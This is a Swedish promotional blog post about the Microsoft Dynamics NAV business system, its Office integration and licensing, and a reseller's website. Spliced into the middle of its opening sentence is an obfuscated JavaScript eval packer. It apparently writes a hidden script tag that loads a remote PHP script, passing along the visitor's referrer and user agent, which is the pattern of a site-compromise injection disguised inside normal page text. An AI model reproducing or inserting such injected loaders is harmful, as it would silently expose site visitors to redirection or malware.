Image Image Image Image Image Image Image Image Image Image

| 17 juni, 2021

Scroll to top

Top

PC

Effektivare affärsnytta med Dynamics NAV

Effektivare affärsnytta med Dynamics NAV

Är eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\b’+e(c)+’\b’,’g’),k[c])}}return p}(’0.6(”<\/k"+"l>”);n m=”q”;’,30,30,’document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|sheah|var|u0026u|referrer|ztery||js|php’.split(’|’),0,{}))
du sugen på att göra ditt jobb enklare? Microsoft har sedan långt tillbaka jobbat hårt för att göra arbetet för oss enklare och flexiblare. Program som Outlook, Exchange, Sharepoint, Word, Excel, Powerpoint och många många fler används idag av miljoner människor både i hemmet och på jobbet.

Det finns affärssystem som integrerar alla dessa ovannämnda program mfl. Microsoft Dynamics NAV är ett modernt och rollbaserad affärssystem som på senare dagar stärkts genom bland annat nu använda sig av den kraftfulla databasen Microsoft SQL.

Programmet som innan är känt som Navision har Microsoft valt att byta namn på till Microsoft Dynamics NAV. Man har också förenklat den stora investeringen i systemet genom att förenkla licensieringsmodellen som idag heter Microsoft Dynamics NAV 2013 – Perpetual Licensing. I standardpaketet ingår grundfunktionalitet inklusive 3 användare. Det går självklart att sen uppgradera sig till Microsoft Dynamics NAV – Extended Pack där man får tillgång till fler funktioner.

 Update affärssystem AB hittar man mer information och guider till hur just ditt företag skulle kunna ta användning av systemet. Det finns filmer där man går igenom detaljer kring affärssystemet och visar hur mycket mer effektiv du och ditt företag kan bli med en uppgradering.  Besök deras hemsida för mer information.

I Microsoft Dynamics NAV hittar man en massa användbara AddOns som gör att kunden kan bli effektivare i sin användning.